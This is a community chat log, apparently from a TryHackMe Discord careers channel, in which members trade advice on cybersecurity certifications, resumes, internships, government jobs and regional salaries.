#cyber-and-careers
I never took A+ or Network+ went straight to Sec+
I learned networking when I got hired for Network Admin, but I do recommend CCNA/Network+ then Sec+
I have my Sec+ and that's it. Working on CySA+ and then PenTest+ since the studying seems to have the same material
Why test yourself on same material several times?
Good question. I was honestly just going for Certs. After those I was gonna hit CISSP
Why not certificates of different expertise then?
I wasn't sure what to take. The big one is CISSP but I need more time to study for that
What are your goals in the field?
Nice I am skipping PenTest+
going straight into CISSP and OSCP
From what I've heard, OSCP is the hardest to master so good luck!
No it is not ...
Okay. Just what I've heard @loud fern.....
Ooof I have lots to learn
But CISSP is what I am prepping to get this year hopefully
I might go for CASP+
or one of the pnpt certs I been eyeing on
Good luck.

Remember that OSCP is considered to be entry level. It's tough, yes -- especially if you're coming at it without a lot of experience -- but it's far from the hardest.
TL;DR: don't listen if people try to big up how difficult it is -- chances are that stems from it being seen as the gateway cert into pentesting, rather than the actual difficulty of the exam
More to the point though, why are you specifically wanting CISSP and OSCP?
Thank you for the generous feedback @undone shore. The only reason I want to get CISSP is for the cert on the resume. I'm just breaking into the cyber career full time and need to stand out more
Gave +1 Rep to @undone shore (current: #9 - 737)
Do you know what roles you're interested in?
I have part-time experience in Cyber Analysis and System Administration. I'd like to continue on with Cyber Analysis and maybe go to Cyber Engineer
Generic titles for the most part
Assuming those are largely relating to SOC analysis?
Yea pretty much lol!
Good luck Dan
My job been prepping me for CISSP, and they are willing to pay for my exam, that is if I passed lol.
So I hope i can pass
Hello all, I have 4.5 years of experience as Product Manager and then pursued masters in cyber security, currently I have no experience and getting an interview for one looks difficult.
Kia ora everyone, I'm based in New Zealand and have just started my journey is anyone from New Zealand who can give advice as to where to go for extra training / study or can someone point me in some other directions / info that I could read to help further progress myself?
Only doing it for the sake of having the paper is quite bold. You need 5 years of experience working in the cybersecurity field, ISC2 has membership fees, and you also need to maintain your certificate by collecting CPEs every period. If you don't need it, then I wouldn't say it's a certificate to go for; in fact it could work against you. If you want to do SOC analysis and you have CISSP, then as a potential employer I would think: 1. You are that over-qualified, why do you want to do SOC, what am I missing here? 2. You have CISSP, are you going to expect salary based on that competence? Basically it would only add reasons to not hire you into SOC.
Overall, having senior-level certs or just a lot of them, without any experience, will always seem weird to an employer
Do you have any experience or background in IT or in any related capacity?
Good luck! How are your preparations going? I remembered when I first saw how many pages the AIO and Sybex books have, I thought it might take me a year or two to read either book.
I have a lil, been doing a lil bit of fullstack, just started and want to gain some more skills
Any area of focus you are looking to dive into or just looking into what career options you have within cyber?
Yeah mainly looking to see what career options are there as in NZ the tech sector is a lil hard to get into but I want to get more skills to have more job security
Just don't be paper tigers guys, really..
what roles would CISSP usually determine to be contributing experience for example atm my job title is that of an IT manager but i cover alot of security aspects as well as development ones as well?
if any of 2 or more
ohh okay cool so guess it'd fall under domain 1,2,4 and 5
CISSP in Europe for example is often seen as a manager's certificate, so if you are IT manager, I'd say CISSP is justifiable for you
that would make sense, im in australia so most companies are behind in what people should be using if im honest
makes it hard to get solid information
Eh, that loss of information is everywhere
thats fair
im doing a grad cert atm which not sure if i should roll into a masters or not but i've been looking into certs to pair with it either way since seems alot of people prioritize certs when moving between companies
Well - what is your goal? If you have a certain goal then obviously following what others do might not lead to it
security architecture is where my goals sitting atm, i've got a pretty big software engineering background and done it management last 2-3 years, i'd love to end up in a ciso position eventually as well but that would be much further on
also interested in pentesting/bug bounties but more of a sidehustle
Most likely master's won't get you there, I might be wrong but often times Masters' degrees are for manager training, not so much for technical training. Technical certificates would be a good route for security architecture to go for
correct me if i'm wrong but wouldnt security architecture generally fall into that category? given nature of it
also what certs would you recommend
Yes and no, its up to companies themselves to interpret how they apply this role. I'd say its more an advanced engineer.
Depending on environment, Red Hat has something nice called RHCA for example
ohh okay thanks
Gave +1 Rep to @loud fern (current: #556 - 7)
will still eventually do masters i think but might just finished grad cert then do rest later down the line
Sure, good luck, never going to oppose anyone from learning new things
just wish the price behind it was slightly less lol
but atleast i don't pay it straight away like certs
PhD?
what area of cybersecurity are you hoping to get into?
a grad cert is something I've seen in the US, not sure about other countries but its MS level classes but not a full MS
Hey guys please I would like to know what it takes and cost to start an MISSP Firm , any suggestion would be appreciated
Experience in many areas of cybersecurity, connections, $$ is not that important, but you might need to pay for cloud service, EDR's etc upfront
I have the experience. been hacking for years for knowledge even before all these damn certifications were coined.
as for EDR there are some opensource SIEM EDR solutions out there.
earliest cyber certifications were in the early 90s
anyway, this is probably not the right place to ask about starting a MISSP firm? which I'm guessing is related to what people call MSPs. There may be some forums on LinkedIn that could be useful
Haven't begun yet lol, unsure where to start or what books to buy
Hey y'all!
So I remembered I was helping a buddy of mine build up his cyber security company for five years. I made cold calls, set up appts, and even caught McAfee's attention as they wanted to negotiate a contract with us.
Unfortunately that small company went under after the pandemic.
I was wondering how I can use that experience to my advantage in this rough job market.
I didn't do anything technical; no pentesting or anything like that, just more administrative work. Although my buddy did educate me a lot on the technical side of IT security.
Any ideas on how I can use this on my resume? I don't want to embellish my experience, but at the same time I really need to start adding anything that can get me some attention.
So I don't work for a company that sells cyber services but many do. I would potentially call this pre-sales support. This isn't a cyber position but lots of companies that sell Cyber/IT services do use people like this
Thank you, I'm gonna try to leverage this in my favor.
Gave +1 Rep to @pseudo creek (current: #14 - 473)
security architecture is the goal for now
@pseudo creek
no need to tag me but security architecture generally focuses on various parts of cybersecurity
yeah sorry was just to link you previous thing i said
like you have to have a breadth of knowledge for technologies and security and generally you are a practitioner of cybersecurity of some sort before going into architecture
I'm a security architect but my focus is on cloud, devops, infrastructure
Are there any courses you recommend for cyber security
alot of that is around the area im wanting to head towards
well a masters really won't help with that
depends a lot on what you want to do and what country you are in, if you are just starting out, TryHackMe is a great way to learn some of the basics
would a masters help with anything outside of like ciso roles then?
it helps if you are already working in cyber and want to be a manager
I started with the Udemy cyber security course and I am getting good results. Then I have to choose which topic to work on
yeah i've had a software engineering background since 2012 and it management experience since 2-3 years ago so basically was trying to better breakthrough to security side of things since company im doing the it management for im doing everything from cloud to websites and having to make sure its all secure anyway
also did a decent amount with htb academy since its cheaper with education but done a few ctf's and what not
Do you have any certs? Are you doing hands on work?
i've got a bachelors in IT but haven't done any cyber specific certs, at the time figured if i did the bachelors and built up skillset through htb/tryhackme would be better for now since its a degree
but finding certs seems to be heavily valued
best books to learn hacking
I recommend Kali Linux book for learning tools for hacking
question, whats the youngest one can be to actually start working in cybersecurity?
There are no legal restrictions regarding employment, depends on local laws - when can a person start working.
Would you put tryhackme study/experience onto a linkedin page and if so where abouts?
Perhaps just share you room completions, badges earned, certificates earned.
That's a good idea. I'll just share the main ones
I think its better to write what did you practice and learned during your time on THM. They dont care about badges and completed paths.
alright, thank you
Gave +1 Rep to @loud fern (current: #379 - 12)
Cybercriminals are sometimes as young as 13 years old (or less), so having an age requirement would be weird
aah i see, thank you
Guys I am looking for SOC and pentesting entry level role please anyone help
Look in your local area and apply.
Not under the experience section of linkedin, you can definitely make posts about completing paths though
That's going to depend on not only your local laws, but also the amount of risk a company is willing to take on. Persons under the age of 18 also can't sign/be held to contracts. What I am trying to say is that it would be very unlikely for a company to take someone on under the age of 18, disregarding any experience requirements.
Not sure if this was a lost in translation thing, but there are definitely legal restrictions on employment set forth by labor laws. Especially if they are minors. (US point of view)
Yeah, what I meant to say was that there is no age limit past that usual working age, like to run for a president at many countries, you need to be over certain age.
If you can work legally at gas station then at same, you can legally work in cybersecurity age wise
what if they are over the age of 18 but with little experience
?
You'll need to build the experience working in other areas of the computer industry. Cybersecurity itself is not an entry level area in the grand scheme of the industry. Without a degree, a common starting point is IT Helpdesk.
Yeah, experience can get in the way, but employer can choose to hire you without experience, just it wont happen often
thank you, both of you
hi i wonder if anyone can point me in the right direction... i have 0 IT experience but certified in az900, sc900, comptia network+. i've been told i can start getting into cybersecurity (will be doing the security+ and CEH soon) but what jobs can i search and apply for now if any? thank you
You can apply for network technician or help desk/support.
For a no experience internship resume, should I include the projects I have done with skills in bullet points without elaboration or should I keep the projects in my portfolio link & elaborate on my skills (for example good understanding of this, familiar with this etc) ?
Working in government like:
"We will provide you with 5 SANS courses and GIAC certs"
Also government:
"No we will not cover 1 year of THM"
Take SANS over THM.
I have no choice in the matter. It's required
Not to say anything bad about THM, but SANS is not affordable by people out of their own pocket
Do you have any choice in which SANS you get or is it something determined already?
Yeah I know. Passed my GCIH today, actually.
Congratulations!
It's predetermined but later, I can request pretty much any course I want
From SANS. But not HTB or THM
If you have GCIH then you don't need THM, but I might be biased
Honestly... GCIH isn't nearly as good as the junior penetration tester path
Perhaps, I don't really have experience with their Red Team ones
So I cannot really comment much on it
But still. Its typical government logic that as soon as they have a contract, it's easier to request a 8000 dollar course from sans than a sub 1000 year subscription
For some reason I did have good impression of GCIH, mind telling me why its not as good as junior penetration tester path?
Don't know about GCIH but Jr Pentester is amazing
It's not as complete. The labs you have to go through are a walkthrough of steps instead of having to apply to knowledge to a lab
And Jr Pentester covers more, like AD, phishing and more enumeration
In THM?
Yea
Odd that they are not setting you up for Offsec courses if they want you to do red team certificates
Maybe it's just government thing
It's not offensive per se
It's general security. After this we can specialise in Blue, Red and DFIR
We get a starter course in all
Sec450, then it's FOR 508
Ah, I have 450, currently also working on FOR508
It can give a quite nice overview, I don't have anything bad to say about it
You do in class?
Nope, books, full self-study
Hard core man, good luck
Thank you, it has worked the best so far for me
You should do some home projects, build virtual machine and play with some shit so you can write that down on your resume. They always love "personal projects".
Personal projects are best interview material where you can fully just talk of your experience
i didn't add projects section because there are on my website
What roles are you applying to, that you aren't getting a response?
cyber security and software engineer
It seems very difficult to find a job without a reference.
I agree, networking with people plays a huge role in landing a job especially in these trying times
Do I understand correctly that every role you had in experience is 1 month long?
Given the dates, those are summer internships
Also those skills, you might want to evaluate your level in them, what do you mean by cryptography and networking?
My opinion is that your resume is not very well focused.
Make separate CVs, one for Security jobs advertisements, one for software engineer, and be more broad, but more in scope
Keep a master copy of your resume that has everything, and tailor a copy of that to each individual job you are applying to. Try to map items in the job req to specific things you've done. The skills section is probably fine, I'm not a fan of that resume layout though.
If possible - make similar layout for skills like in experience, say what you know about this field/skill
The About Me is also pretty close to 1/3 of your actual content, condense that down. It should be the elevator pitch to get someone to listen to your elevator pitch
Mehmet, I also think @flat sedge (Just in case, I said i agree with you juun) is right, two separate CVs make much more sense. But since you are a computer engineer, isn't software more suitable for you? I'd recommend looking at Estonia, apparently there is a very serious need there, you could even go there. Don't get me wrong, it's not that I know a lot about it, but these are my thoughts, it's up to you.
English only, please. It makes it difficult to moderate chat if other languages are used
thank you guys I will do what you say
actually 3 years
i made personal projects, watching course, reading security essay etc.
but i didnt write my cv
Didn't just understand the notation of writing the dates there
should i delete?
This right here sir mahmet!
Tailor your CV for every different job, don't just send same s*** to everyone.
ok sir thank you everyone
Before going into Cyber I used to work as a recruiter for the cyber security sector, if anyone wants me to take a look at their CV I would be happy to
Can you provide another screenshot of it? So we can see it all on the left
So should I put the colored part on the left side?
i am editing rn, making a CV focused on cyber security and soc
No I mean
Your picture is not centre
I can't see the left side of it
Most CVs these days go through a ATS before it reaches the HM
So the design/structure of a CV should focus on being clear and easy to read
I don't use photos in my CV should i use
i see
i will send when it's done
columns are horrible resume formats, like Husky said, most will go through an ATS and you really don't want to risk columns messing with it. Also drop the company icons/emblems
guys, would u check again @pseudo creek @mortal quartz @loud fern @frail hound @flat sedge
Strongly recommend using a bullet list instead of prose to delineate and explain your tasks and duties in each role. Your Objectives paragraph is also written in first person, and is pretty useless to a hiring manager. You aren't really saying anything there that captures the attention. If you want to keep that, it should be an elevator pitch that sets you apart from other candidates.
You say experienced SOC analyst, what experience you mean by that? Because if I read this and then I read your work experiences, it does not add up
This looks worse than before mate. My resume is kinda similar to this one
You have free templates online to use, I think I used this one?
I think is not good to use I did or I did that
quite a few things wrong with this. No picture should be on your resume. Ideally you'd want your name on the left, contact info on the right. no background as that can totally mess with ATS. A title is just wasted space. The headers are too big. Lots of wasted space for the professional experience by indenting. Of course if your resume doesn't have a lot, you can do that but... PNPT is not education, it's a cert. I'm guessing the same for CWNA?
I know you said that isn't yours, just similar but just pointing out some concerns with that resume
Fair enough,but still it got me job 
Is it best to include the skills with ur current level (wireshark -proficient) or just mention it without additional info ?
Offices want me to know the ERP system well, but I have never experienced it before. What advice do you have for me to understand this subject?
Hey guys. Has anyone taken the Blue Team level 1 course from the Security Blue Team? I'm about to finish SOC level 1 on THM and I was thinking about jumping into that one? Have seen few companies here asking for it as a "good thing to have but not necessary". Thank you in advance
ERP systems can be quite complex, and depending on the organisation, can be highly customised to facilitate the specific way that business is oriented. An ERP is designed to allow an organisation to structure its operations around that system, combined with things like CRM, Finance, HR; to integrate and synchronise all the business's processes. Firstly, the company is reoriented to operate around the ERP, and then the ERP is customised to meet the needs of, and fully facilitate those operations. You might need specific training on that org's ERP. Is it SAP, Microsoft, Oracle, Workday, or some other one?
very constructive advice
Sure buddy
Would be nice if you could say why it looks bad
Thank you for helping. I think it is used in the networking field in the office where I did my internship. (server control etc.)
Gave +1 Rep to @rugged delta (current: #21 - 362)
Hi everyone, I've been currently working as a cybersecurity specialist for about a year now (Got the opportunity to be in the forefront at my current company) - my job entails mostly doing GRC work, but a little of incident response/SOC work as well at a small sized company and wanted to upscale my career in the field by pursuing a cert towards maybe a Security Auditor. Is there any recommended certifications towards that goal? Currently studying for the security + exam. Thank you in advance for all the help!
May I ask have you got your current job with an IT background (CS degree etc.), or its totally different than that? It would be helpful for the others
i want to start free lance as bug bounty hunter , where do i start ? currently im taking Jr pen tester path on Tryhackme and an ethical hacking udemy course .
Few years in helpdesk and university degree in cybersecurity.
Has anyone taken the CISA exam before?
what core skills do i need to land my first cyber security job ? im a computer engineering student and almost a graduate
currently registered cyber security course and doing try hack me rooms and self learning
There are two types of CVs when it boils down to it. A "Doer" and an "Achiever" what differentiates these two types of candidates is the choice of language in a CV. Your one right now is a "Doer", modify your language (and stop writing in the first-person) to focus on what you have achieved i.e., the end result. Rather than what you have done.
CISA is the primary cert that I'm aware of for auditors
Oh and I see you already mentioned it. I don't know anyone who has taken the CISA, just that it has a solid reputation in general
Yes that's one of the services an ERP can provide
i like more this
For your skills instead of AWS, I would put down the specific services you have experience with
As for work experience that list I assume are internships, this could however cause issues as they may think you only lasted a month, or are a contractor, if the latter, they may be wary to why you are applying for a permy position. So I would simply title it as Internships to avoid confusion
You need to improve your English in your CV "The client provides features like"
don't use the word "like" in your CV
What position are you applying for?
I personally would refrain calling myself a SOC analyst until I have actually achieved that position
You have lots of emphasis on your technological knowledge, in that position I would also bring out interpersonal skills, this is not a one person job, you are expected to work in a team
I will say that anyone can put interpersonal skills on a resume, but those are really tested in an interview. I wouldn't put interpersonal skills although you could put things you've done that would reflect interpersonal skills
such as coordinating, leading, etc
Yeah don't list communication skills or interpersonal skills on your CV you demonstrate that in the interview and show it on your CV when discussing your experience
i.e., if you have experience in stakeholder engagement, mention that in your duties/achievements rather than listing interpersonal communication skills
well, what do you think about this question
IMO yes.
Most interviewers will spend around 30 seconds reading your resume/CV.
If that
thanks everyone
Do you think it's a cert worth pursuing with about 1.5 years of experience? I don't mind GRC because of the work life balance but feel like venturing out a little. I was looking at other areas of cybersecurity and was looking into an Incident responder or forensic analyst.
I think it has some work experience requirements, I thought it was 5 years but I could be wrong
You're right, I searched for it and it's 5 years minimum.
Trying to figure out how to upscale my experience to move to a better company/ position. I'm currently studying for the security + as well
It depends at what point of your career you are at
You are at the start so should be no more than 1 page
Can the certificate we received from an online course in cyber security be important in our CV?
Certificates? Not particularly. They generally don't verify that you have actually done the work yourself or confirm that you know the content to a certain standard. Certifications fill that role.
So can we say that it does not have much effect on the CV?
exactly
Can we say that Computer Engineering is one of the university departments closest to the field of cyber security?
depends, some schools may include cyber classes in computer engineering, others would include it in computer science. Computer engineering tends to focus on hardware side while computer science would focus on software side
I am undecided between software engineering and computer engineering at the university in my city
Check both curriculums, the professors that teach there, reviews about both programs, etc.
Personally i went with computer engineering bc its hard to get hold of lab experience with microprocessors and whatnot outside of computer science and software engineering
thanks I will check
Gave +1 Rep to @dense dagger (current: #22 - 352)
Completely dependent on the curriculum and electives you've taken.
Do web devs ever beef with pentesters?
Are they ever made to feel like theyre bad at their jobs when vulnerabilites are found
Yeah i think they do feel bad
From my experience, while occasional disagreements do happen bc the dev doesn't think its a real issue versus security's POV, a lot of them do approve and are thankful there is security testing
It also upskills devs to be more security aware
Oh yeah definitely but its always a matter of perspective
Im about to step into the field soon. Obviously its all dependent on the team. But generally how do you find the personalities of cyber professionals.
Are they welcoming or a little bit up themselves.
in your experience @dense dagger
Yes that happens, they usually do this by trying to convince the pentester to change the classification of a vulnerability from critical to medium for example. Some employees lose their jobs after such audits sooo it depends on how the company treats pentests.
yo guys, where can i find other source where can i start to study cyber?
it's a big field, there aren't that many places that cover everything.
I just started recently but I don't really know where to focus
starter paths on tryhack me are a good guide to get started.
pre-security and intro to cybersecurity
Hello guys, i have a problem when play Brainstorm room. I can't run chatserver.exe for BoF attack. i use Windows 7 32bit VM for run chatserver.exe, but show error alert "This program cannot be run in DOS mode". do you have ways to solve that?
probably #room-help if it's a thm room
hello there, Im looking for advice on what certification I should pass and I can aim for,
I'm currently studying IT (Im on my 2nd year of my degree wich is a 3years degree)
I've been studying cyber for quite a moment right now so guess I know the basics from now on (basic recon using nmap, burpsuite, look for information efficiently through exploit databases, google searches, using metasploit, escalate some privileges etc...)
I'm planning to get certificated at the end of the next years so what certification can I aim for ?
thanks
Gave +1 Rep to @ancient fossil (current: #1009 - 3)
hello....i need help with getting a remote job can anyone help me out?
You'll find plenty on linked in
shit

Any suggestions ?
for red teaming?
Net+,sec+ are good starting cert
first time being considered for a position in cybsec and was sent to take a reasoning (matrigma) assessment. Is this often encountered in the hiring process of this field?
Oh yeah, I just got done with one a few days ago
It might be due to what position you're applying to also
Most entry-level have those type of assessments and those are from HR first before the actual technical assessments
Thank you for the info! I was confused and thought it was a bit useless so I wasn't sure if it's common in this field or not
Thanks I'll look them up, was thinking about passing pentest +
Gave +1 Rep to @violet pumice (current: #380 - 12)
Has anyone taken Sec+ I'm just trying to figure out what to expect to hammer those study points hard so I can pass first go, any input is welcome thanks in advance
Feel free to DM if you have any specific questions
im currently wondering which education to choose first between security tester and security specialist
does anyone know the core differences?
where are you getting this education from?
i know tester is more like a pentester and ethical hacker but what does a specialist do?
its a school in sweden
.
do you have details ? I mean every school can call whatever it wants something but a curriculum would give you a better idea than a title
basically what they said was pentester is the type of hackers that try to hack systems and find problems and it security specialist was responsible for setting up systems in the networks etc
ok so they gave you no curriculum? just generics? its hard to tell, but I'd choose based on what interests you the most
Im pretty interested in crypto and blockchain development and the entire crypto space, do you think this could affect my choice of career between these two choices in any way?
neither of those have anything to do with that
I know, but maybe one of them is better suited for someone living a crypto lifestyle
?
No
Cryptography lifestyle, maybe.
Is there any progress?
Hey everyone, I'm currently working as an operations analyst (not security related but its my first job in IT and I'm getting some great foundations in network and systems administration). I have a goal to become a penetration tester but I wanted to reach out and get thoughts: How useful or practical is blue teaming, like SOC Analyst or Engineering experience, before pivoting to a pentesting role? Do we feel its worth it or should I just focus on red-team stuff? All thoughts and ideas are well appreciated, hope all is well everyone!
Give me a bit of time and I will review it
so in terms of masters is it just ciso roles which it would really be applicable to?
or would there be other roles as well
mostly asking since a masters is just an additional year compared to grad cert/diploma so trying to work out where the value of having it would sit
masters are mostly for management once you get into cybersecurity
the primary issue with masters is if you don't have real world work experience, it has the chance of hurting you
i've got a bit of experience its just more around it management rather then a purely cyber role but i've had to cover some security aspects as well
im more or less just trying to workout what parts of management it would help with
well if your goal is management, its not bad especially since you already have experience
since its only a year longer then grad cert which im half way through
originally i was going to aim towards security architecture but im happy to rearrange things i'm just trying to workout essentially what level of management it gets consider as almost a requirement
or if its just a nice to have
its a nice to have
alright that makes more sense
i was almost not gonna go all the way through but i thought about it and figured it would only be a year extra and its better well known expecially when dealing with non technical people
thanks, you've given me clarification in where it sits
Gave +1 Rep to @pseudo creek (current: #14 - 474)
Are there any government jobs in the cyber security field?
Depends where you live, I'm employed in one.
So am I. Governments have a hard time competing where I live so you usually get generous benefits besides pay
Especially in regards to training and education.
did you review
Yes
Which type of exam did you give to get the job
Or are there any exams from which we can get the government job
Usually for government jobs you need college education plus years of experience.
Okay
This is going to be dependent on which government you're looking to work for. Using the US DOD space as an example, a degree of some kind is pretty much mandatory and then specific jobs will have different certification requirements. You can't go wrong with Security+. I will say, if you're a foreign national trying to get work in that space, good luck.
hi
Wdym years of experience
What type of experience are they wanting
IMO, it's a little broad of a statement, but all Federal Government (US) positions are posted on USA Jobs with their respective requirements.
I see
Other countries have their own way of doing things
Wait so how are they considered entry level if there are requirements
Some considered entry level
Or that just a term they throw around?
I don't think entry was specified in the conversation? However, all requirements for roles are listed on the posting. Again, this is US specific.
Oh yeah entry wasn't specified sorry
Last year we had some job opening in my country, something similar to DoD/FBI and they wanted 5 years of college + at least 8 years of experience in cybersecurity.
But sure it depends on country.
govt. never pays what that level of experience is worth.
The state hires anyone who has political acquaintances
It really depends, Gov is likely going to be slightly lower than private on raw salary. You have the base GS scale, which gets modified depending on your location. The base itself not very good, it's low for cities, but with the location mod it gets more reasonable. However, not all government jobs use the GS scale, there are separate scales that are more in line with what private companies pay. You typically see them more around systems engineering roles. The main driver for government though is the benefits and stability.
This is for US
I went in off of my degree with no experience, getting over 100k. They asked for evidence of various skills but that was it.
that's good information. much appreciated
Yeah, pretty much the same thing. I didn't make 100k out of school though. Got a call, felt like I tanked the interview, got hired, and now I'm moving on. Solidly in six figures now.
Also for clarification, where I am. The 100k is about average for private, however the good private pay more. We just have a lot of bad private companies that pay average.
I'm in the DMV, but I also don't think if a company pays the average for the area they are a bad private company. It's the average for a reason. I would moreso apply the bad label to companies that knowingly underpay their employees.
which, honestly, is usually dependent on the manager trying to hire for value and the candidate not knowing what to negotiate for
If you are from USA, 100k is not special for someone with "good" skills.
I am not, and this is an entry level government position for cyber. Like I said, no experience.
Oh then sounds cool, congrats.
When did u graduate ? (if u dont mind me askin)
USA is crazy for tech jobs with 100k right out of school. In Germany you're very lucky if you get 70k+ with a masters degree in cyber security (achievable in the finance sector).
~50k is a realistic expectation for a bachelor in the cybersecurity sector.
Try with Poland, where 50k would be a dream for some senior engineers lol
Then again, we got lower cost of living and better workers rights. Much harder to be suddenly let go with a 2 weeks notice in Germany because the company did a financial oopsie.
Yeah the pay gap even between european countries is crazy
Yeaaah and the cost of living isn't that different :/
I read a news article recently about average income in Germany and it also listed the average buying power of citizens of different european countries. Buying power I think is money after taxes.
Anyway Germany was #9 with ~26.3k and Poland was #28 with ~11.9k. Ukraine was at the bottom with 2.5k. Switzerland had ~49.5k.
I'm changing careers and haven't looked for a job in awhile. Is it common to get a remote job by only submitting a behavioral/technical questionnaire?
I think it also applies to regions in the same country ? I mean there's Berlin and there's Munchen
I got hired with an applicable uni bachelor's, no previous IT experience and the government organisation I work for is giving me time and opportunity to train into a technical field. We very much have junior positions in literally all fields
The pay gap between the new and the old federal states is notable, but it's not as crazy as poland vs germany for example, or germany vs US.
Even the intelligence agencies hire 'junior hackers' that require little actual experience. Just certs and skills
Unlikely that it's a single stage process, usually you have a (video)call for getting to know you, general stuff then a technical test if it's needed (you might be very convincing) and then the offering
depends on a lot of things, mostly being able to position yourself (knowledge level) in a world context. Also it's about flexibility (relocate)
when I was looking at jobs in DE, roughly same role was 80-90k in Munich and 60-65k in Berlin
Fair enough
but also the rent is double
that's why I find the 'salary' discussions a bit useless, context matters .. is it a 50k remote role where I can live with 5$ at my grandparent's country house or 100k in the middle of XX where rent is 1500$/mo
Yup, if you wanna live in Munich, Berlin or inner city Frankfurt you better get ready to sell some of your organs.
Im not German but i feel that struggle deeply
My honest plan is to just get a remote job in a big, well-paying city and then live somewhere on the outskirts of a moderately sized city. Urbanized enough to get everything I need, cheap enough to live comfy and calm enough that I don't lose my marbles.
We have people here who work in southern\eastern cities in the NL and then go and live just across the border in Germany or Belgium
Oh yeah, NL got higher cost of living but similar wages afaik.
Yes. Personally I can't complain because of all kinds of reasons my salary had a 50% increase in 2 years but especially the housing market is royally fucked rn
The dream would of course be to live in Germany but work in Switzerland, but that has its own complications (plus a lot of competition from other Germans wanting the higher wages and better taxes).
For now though, I am just thinking about the immediate future. Gotta get some experience in and then I can try crazy / greedy strats :)
isn't it the case that you pay the income taxes in the country where you live more than 6mo/year? like your tax residence
Yeah fair, you'd have to live in Switzerland for most of the year probably. Pretty sure there are legal ways to have your cake and eat it too, but they are effort.
who knows the kali linux hacking
wut?
define "Kali linux hacking"
Guys what is the best way to monetize my hacking skills (from Home)?
Like a few people said that BugBounty/BugHunting is the best way to do it, but are there another options?
doing vr
find bugs in important software and report them
very few people are good at binary exploitation so if you're in the 1% who is good at it it can be very lucrative
hey guys i got my junior pen test certificate 3 days ago. 5 months ago i didn't even know linux, was too scared to even try linux. and then one of my friends said i must try it and i got hooked, couldn't stop, still can't. and from linux i went to cyber security. i'm from south africa and i don't think we have a lot of hackers, well i hope not lol, and i know there are a lot more people on this group that are far better than me, so skilled, but the question i have is about tryhackme. now don't get me wrong tryhackme is very nice and i've learned a lot but am i learning the right programs compared to a real hacker? example metasploit vs https://bruteratel.com/ and netcat reverse shell, no hacker will ever use it because his ip will show up. even google tells you that. i know you learn the foundation but with today's tech shouldn't we be learning what real hackers are learning? how am i supposed to check a company and give my word that everything is fine if i know it's not. today's hackers aren't in their 30's, they're 10, 13, 16 years old. i might be wrong but just how i see it thanks
Congratulations on earning your junior pen test certificate! It's inspiring to see how quickly you've progressed from being unfamiliar with Linux to diving into cybersecurity. Respect!
While platforms like TryHackMe are great for learning, supplement your knowledge with real-world experience and stay updated on industry trends.
So it's an experience thing sometimes
thank you
Hello, I took a cyber security course 2-3 months ago and entered this field that I love. I couldn't use sites like TryHackme much, but the information the Udemy course gave me was very valuable. I think you should start a course and learn the basic functions.
Metasploit is often used by both white and black hat hackers sooo this knowledge isn't worthless
Most of the stuff you learn here can be used in real life when you're testing real companies
absolutely, it is always necessary to look for and check for vulnerabilities
thanks will check it out
Gave +1 Rep to @warm furnace (current: #2030 - 1)
thanks
will do
just because there's newer methods, doesn't mean the old ones don't work if a company overlooks them etc
noted thank you
thanks for the advice appreciate it
Hi guys I would like to ask you for some advice, I have a master's degree in data science so I am not new to the IT field but apart from some general knowledge through tryhackme now two years ago I know very little and I would like to take some important certification in pentesting. Do you have any advice on this? What certification would you recommend in this area to have the opportunity to make a career path change from data science to cybersecurity? Or even better do you know if there exists a field that mixes these two?
OSCP is the standard certification for new pentesters and most commonly recognized one
Only cybersecurity field I can think of that could be related to data science due to its properties is Threat Intelligence, but don't take my word on it, there are a lot more people more qualified than me to comment on that.
thank you Rannet!
Enrolled in what, exactly?
Hi everyone, I'd like some input into a security internship decision. I need to decide by tonight/tomorrow morning and I'm having a hard time gauging which position would be better for my career in the long run. I have 2 offers: Microsoft Security Research intern, and NVIDIA Info Sec Analyst intern. In the long term, I see myself working in security engineering or DevSecOps.
Can I get some input into which internship would lend me the best experience to align with those long-term goals?
with an internship, I wouldn't sweat it too much, did they each offer some details on what you would be doing?
NVIDIA did, as an infosec analyst intern I'd be automating some of their manual GRC tasks and meeting with customers about NVIDIA security measures. MSFT didn't give much insight into the security research internship because they said the project is dependent on the intern's abilities, so they don't decide until the intern has accepted, but the role is very much technical. To me, it sounds like NVIDIA aligns more with security engineering, but the role is not technical, so they already told me that I'd be building things because I come from a SWE background and can build things, not because the job requires it.
personally, I'd go with Microsoft, but like I said, neither would be a bad thing
Thank you for the advice, i really appreciate the input
Gave +1 Rep to @pseudo creek (current: #14 - 475)
It's an internship, don't stress about which is better for your career long term. Both are going to be good for you, pick whichever one you think supports your career goals better.
how'd u land these
what was the interview process like?
applied to 91 security internships lmfao. For MSFT it was 3 45-minute interviews in a row with security researchers (all technical but only one LC easy coding challenge, the rest were technical security questions). For NVIDIA it was 2 30-minute interviews a few days apart, with a current infosec analyst and the hiring manager (no coding challenge since it is nontechnical position, a few technical security questions and mostly behavioral). I heard back from Microsoft a few months after applying, and heard back from NVIDIA within 1 month of applying.
Good job though. congratulations.
Well done on getting both of these opportunities. whichever you choose will certainly benefit your career
I Just started tryhackme and wanted to know if it would be possible for me to get a job just from this or if i need more experience
TryHackMe is a good way to supplement personal learning, but if you want to work in security you're going to need some prior professional experience or a degree.
You can read some of these success stories from people who used Try Hack Me to grow their skills and get a job and the full path they took
https://tryhackme.com/r/resources/success-story
As I said before, just the fact that I was doing tryhackme and getting in some progress showed 'cyber affinity' to my current employer and that was enough to get me accepted to the position. That being said, it was an internal application (still a formal process) and they expect me to develop myself towards a technical position
Thank you bro
Gave +1 Rep to @stoic cave (current: #20 - 380)
Alr Thank You
thats good im gonna try do the same how long did it take you personally to learn everything you needed for the job
3 months
But really, i am probably a fringe case. Be aware that:
* I work in government who are infinitely more patient with junior employees
* My employer is more than willing to provide me with time and training to get better. I do not make money for a company, I work for the government, so there is no money rush or crunch
* My background in previous jobs was sought after for the position I applied to. Yes it's a cyber job, which you could put in the 'governance' section, but my previous experience was what makes me valuable for this role, and only this role
* the government organization i work for has a policy that has an approach to creating their cyber people by training from 0 to hero instead of just fishing for talent in a highly competitive pool
That's smart
Easier to get employees if you train them
Yeah and they can afford the luxury of patience. Most likely, there will still be a government in 10 years (I'm not US)
Also, it's honestly better to train fresh people, people who haven't developed bad habits while coding so you can train them in a way that prevents the development of said bad habits. It's always easier to teach someone something they know nothing about rather than trying to get someone to stop doing something the same way they've been doing it for years
Couldn't have said it better
